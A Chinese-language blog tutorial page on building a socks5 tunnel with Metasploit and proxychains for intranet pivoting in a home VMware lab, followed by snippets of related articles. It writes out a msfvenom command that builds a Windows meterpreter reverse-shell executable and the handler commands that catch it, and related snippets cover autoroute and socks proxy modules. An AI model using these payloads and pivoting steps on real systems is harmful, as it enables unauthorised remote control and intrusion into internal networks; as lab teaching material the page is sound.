msf+proxychains组合搭建socks5隧道 | 内网穿透

最新推荐文章于 2025-05-15 13:01:30 发布
最新推荐文章于 2025-05-15 13:01:30 发布
阅读量1k 收藏 10
点赞数 10
CC 4.0 BY-SA版权
分类专栏: IntraNet 文章标签: 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ULGANOY/article/details/141329271

实验环境

网络拓扑:
在这里插入图片描述

kali:

  • VMnet1(公网)192.168.52.134

win10:

  • VMnet1(公网)192.168.52.135
  • VMnet2(内网)192.168.72.133

win2008:

  • VMnet2(内网) 192.168.72.132

学习参考:https://www.cnblogs.com/cute-puli/p/15510271.html

1. 拿下域内主机win10权限

这里直接msfvenom生成一个反弹shell木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.134 LPORT=2333 --platform windows -f exe -o shell.exe

复制到win10,

kali进入msfconsole

user exploit/multi/hanlder
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.52.134
set LPORT 2333
exploit -j

然后win10运行shell.exe就可以上线。

在这里插入图片描述

最低0.47元/天 解锁文章

200万优质内容无限畅学
socks5搭建_[内网渗透]MSF之配合proxychains搭建socks5代理
weixin_39887577的博客
12-08 3270
使用MSF搭建socks5代理首先获得一个 meterpreter shell,然后使用 auxiliary/server/socks_proxy 模块搭建代理meterpreter > run autoroute -s 192.168.77.1/24 # 获取路由meterpreter > backgroundmsf5 > use auxiliary/server/...
快速使用proxychains设置代理上网
weixin_34138377的博客
12-18 3237
快速使用proxychains设置代理上网背景介绍:由于公司内部上网权限管理比较严格,因此放置在公司内部的测试服务器只有少数可以上网。而proxychains就可以非常简单快速的设置好代理,让其它不能上网的服务器通过能上网的服务器进行上网。proxychains只需要在不能上网的机器上安装好,而能够上网的服务器,是不需要任何配置的,只要能SSH登陆就可以。服务器环境:可以上网...
[超简单]MSF远控内网穿透教程natapp
最新发布
godfish44的博客
05-15 875
内网穿透的原理很简单,就是通过代理服务器进行转发,要注意的是生成木马的端口要填写代理服务器的ip和端口,本地kali的监听就填写本地ip(127.0.0.1)和本地端口,本地端口要和代理隧道配置时转发的端口相同才行。
msf添加路由及socks5代理
渗透之路,攻防之间皆学问
05-07 1万+
msf 添加路由 socks代理 nmap在挂上socks代理时进行扫描 -sT -Pn
msf挂socks代理
weixin_74171325的博客
07-06 299
kali环境下msf+proxychains构造代理通讯链实现不出网主机通讯
2302_79590880的博客
12-30 908
linux系统中利用msf配合proxychains构造内网通讯链
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 3445
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
代理内网穿透-Lcx.exe-venom-proxychains
代码审计
04-24 7913
代理面试常问一.概述代理的本质是socks协议
通过SOCKS代理渗透整个内网
热门推荐
午夜安全
10-17 1万+
通过SOCKS代理渗透整个内网 1.背景 经过前期的渗透工作,我们现在已经成功找到了web站点的漏洞,并且获得了一个普通的webshell,现在准备用菜刀去连接它。 注意:本次环境在本地搭建,假设现在一无所知,这样更加真实。 2.对web服务器提权 2.1获取漏洞信息 获取到webshell后使用菜刀连接,查看权限是apache,系统是redhat6.5。 上传linux.sh到...
metasploit-内网穿透
qq_49694748的博客
01-11 3639
socks4a代理 端口转发 ·socks4a代理 实验拓扑 kali拿下web的shell并以此为跳板对内网进行渗透 模块:auxiliary/server/socks_proxy 设置srvhost和srvport为kali的IP地址和端口,注意默认版本是5,也可以设置成4a这点要区分,因为修改proxychains配置文件时会区别5和4a netstat查看是否监听 进行路由转发:post/multi/manage/autoroute 设置好session.
利用proxychains在终端使用socks5代理
foundamental的博客
01-02 2852
1.proxychains安装 1 2 3 4 5 6 git clone https://github.com/rofl0r/proxychains-ng.git cd proxychains-ng ./configure make && make install cp ./src/proxychains.conf /etc/proxycha...
内网渗透-如何利用msf把流量代理进内网-隧道搭建
weixin_42109829的博客
01-10 7931
0x01 前言 在攻防演练时,当我们拿下主机时,我们要开始对内网进行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本进行尝试。 0x02 生成路由 msf操作 拓扑图如下 首先先生成一个elf 马进行上线 linux 生成木马上线文章—>linux主机生成木马攻击 run autoroute -s ip
socks+proxychains网络代理_ss5-3
2401_84254364的博客
04-12 764
测试)**[外链图片转存中…(img-SVaa3ezh-1712914278060)]
隧道工具proxytunnle
分享学习网络的点点滴滴
10-10 1199
通过标准的HTTP / HTTPS代理创建隧道的工具通过HTTP CONNECT方法封装信息适用于内网使用代理并且防火墙只允许代理服务器上网的场景无法创建DNS隧道和ICMP隧道
socks+proxychains网络代理_ss5-3,2024年最新面经解析
2401_84254364的博客
04-13 1064
tar zxf ss5-3.8.9-8.tar.gz cd ss5-3.8.9/ ./configure && make -j4 && make install配置vim /etc/opt/ss5/ss5.conf #在原有基础上进行修改即可 第二个用户认证配置文件vim /etc/opt/ss5/ss5.passwd 以上两项为:用户名 密码启动socks5chmod +x /etc/init.d/ss5 #给socks5的启动脚本的执行权限 chkconfig --add ss5
内网安全--隧道技术-MSF上线本地
金灰的博客
05-28 1050
免责声明:本文仅做技术交流与学习...
msf+proxychains 搭建 socks4a 隧道
10-17
MSF (Metasploit Framework) 是一款广泛使用的开源渗透测试工具,它可以帮助攻击者识别漏洞并执行攻击。而 proxychains 是一个命令行工具,用于通过代理服务器透明地转发网络流量。 当结合 MSFproxychains搭建 SOCKS4A 隧道时,目的是为了在执行 Metasploit 的各种exploits或payloads时,对目标网络进行隐藏,提供额外的匿名性和位置掩饰。以下是简单的步骤: 1. 安装依赖:首先需要安装 Metasploit(如果尚未安装),然后安装 proxychains 和支持 SOCKS4A 的版本,例如 `proxychains-ng`。 ``` apt-get install metasploit-framework proxychains-ng ``` 2. 设置环境变量:配置 proxychains 的环境变量,通常这会将 proxychains 添加到系统路径以便在 Metasploit 中使用。 ```bash export PATH=$PATH:/path/to/proxychains-ng/bin ``` 3. 启动 socks4a代理:运行 proxychains 并指定 socks4a服务器地址和端口。 ```bash proxychains -i socks4h://your_socks4_server:port ``` 4. 在 Metasploit 中使用:现在你可以启动 Metasploit 模式并利用 proxychains 调用exploits或payloads。例如: ```msfconsole use exploit/multi/handler set RHOST your_target_ip run ``` 5. 交互式连接:如果exploit成功,Metasploit 会提示你进行交互式连接。这时通过 proxychains 连接到 Metasploit 提供的监听端口。 注意:这种设置需谨慎,仅用于学习和安全评估目的,未经授权的网络渗透可能导致法律问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值